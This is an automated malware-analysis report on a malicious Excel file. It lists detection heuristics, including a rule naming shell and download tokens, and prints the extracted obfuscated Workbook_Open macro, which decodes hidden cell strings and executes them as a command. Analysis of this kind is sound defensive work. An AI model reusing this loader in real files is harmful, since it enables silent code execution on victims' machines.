MALICIOUS
Risk Score: 148
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro. High-severity heuristics indicate the use of CreateObject and GetObject, common for executing malicious code. The VBA macro code, though partially obfuscated, appears to be designed to download and execute a second-stage payload, likely leveraging the CreateObject and GetObject functions for execution.
Heuristics (5)
- VBA macros detected (medium, 4 related findings), OLE_VBA_MACROS: Document contains VBA macro code.
- CreateObject call (high), OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
  GetObject(Ottawa).CreateObject(Chapters).Run Fisting & " " & Noticed & AnimAted, 0
- GetObject call (high), OLE_VBA_GETOBJ: GetObject call. Matched line in script:
  GetObject(Ottawa).CreateObject(Chapters).Run Fisting & " " & Noticed & AnimAted, 0
- VBA p-code auto-exec with execution tokens (high), OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low), OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
  Sub Workbook_Open()
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4310 bytes |

SHA-256: 7e5d52c65e1dce05cb378373130ac36532e010133055b847aecc0c8f81e5bdfd
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function Mills(ByVal TorTure As String) As Variant
Dim Displaying As Long: Displaying = 0: Dim Genes() As Byte
Dim ExaminEd() As Byte, ExpEnditurE As String, Personalized As Integer, GanGbanG As Integer, Destruction As Integer
ExaminEd = "gc4263a9ce"
GoTo RemaRks
ExtEnsions:
If Displaying < UBound(Genes) Then
Personalized = Displaying Mod (10)
Destruction = ExaminEd(Personalized * 2)
GanGbanG = Genes(Displaying)
GoTo Mistake
Overnight:
ExpEnditurE = ExpEnditurE & Chr(Genes(Displaying))
Displaying = Displaying + 1
GoTo ExtEnsions
Else
GoTo DiviDeD
End If
DiviDeD:
Mills = ExpEnditurE
Exit Function
RemaRks:
Genes = Equation(TorTure)
GoTo ExtEnsions
Mistake:
Genes(Displaying) = Abs(GanGbanG Xor Destruction)
GoTo Overnight
End Function
Private Sub Florence(ByVal Ottawa As String, ByVal AnimAted As String, ByVal Fisting As String, ByVal Chapters As String, ByVal Noticed As String)
GetObject(Ottawa).CreateObject(Chapters).Run Fisting & " " & Noticed & AnimAted, 0
End Sub
Sub Workbook_Open()
Florence Mills(Sheets("l747f").Range("E150").Value), Mills(Sheets("l747f").Range("F186").Value), Mills(Sheets("l747f").Range("F124").Value), Mills(Sheets("l747f").Range("H114").Value), Mills(Sheets("l747f").Range("H162").Value)
End Sub
Private Function Equation(ByVal Introduce As String) As Variant
Dim ExpEnditurE() As Byte, i As Long, Personalized As Integer, Lycos As Integer
Lycos = Len(Introduce) / 2: i = 0: ReDim ExpEnditurE(0 To Lycos) As Byte
Destruction:
If i < Len(Introduce) Then
Personalized = Personalized + 1
ExpEnditurE(Personalized - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(Introduce, i + 1, 2)
i = i + 2
GoTo Destruction
Else
GoTo Victim
Dim Mistake As String
Mistake = InputBox("celp lape")
End If
Victim:
Equation = ExpEnditurE
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```